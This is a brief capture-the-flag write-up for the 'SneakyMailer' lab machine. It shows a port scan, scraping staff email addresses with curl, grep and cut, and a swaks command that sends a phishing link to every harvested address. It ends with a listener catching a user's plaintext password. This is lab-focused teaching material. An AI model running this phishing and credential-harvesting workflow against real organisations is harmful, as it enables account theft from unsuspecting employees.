sneakymailer

Recon & Enum

port scan

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
143/tcp  open  imap
993/tcp  open  imaps
8080/tcp open  http-proxy

nmap gives domain name = http://sneakycorp.htb

directory scan

subdomain scan

http://dev.sneakycorp.htb

website

http://sneakycorp.htb/team.php

page consist of names and emails , nothing more . I can download all email address of the users

curl http://sneakycorp.htb/team.php -o mails.txt

cat mails.txt | grep '@' > new.txt

cat new.txt | cut -d '>' -f 2 | cut -d '<' -f 1 > mails.txt

http://dev.sneakycorp.htb/pypi/register.php

shell as www-data

phishing users

i will try to send phishing mail containing my ip address in the message body , and i open python server on my machine If any user clicks on my ip address i will get a call back

swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197

i did get a call back on python server , now i will open nc to check what i get

firstName=Paul
lastName=Byrd
email=paulbyrd@sneakymailer.htb
password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

i got creds for paul

Previousdelievery NextLINUX BOXES

Last updated 2 years ago

hashtag Recon & Enum

hashtagport scan

hashtagdirectory scan

hashtagsubdomain scan

hashtagwebsite

hashtaghttp://sneakycorp.htb/team.phparrow-up-right

hashtaghttp://dev.sneakycorp.htb/pypi/register.phparrow-up-right

hashtagshell as www-data

hashtagphishing users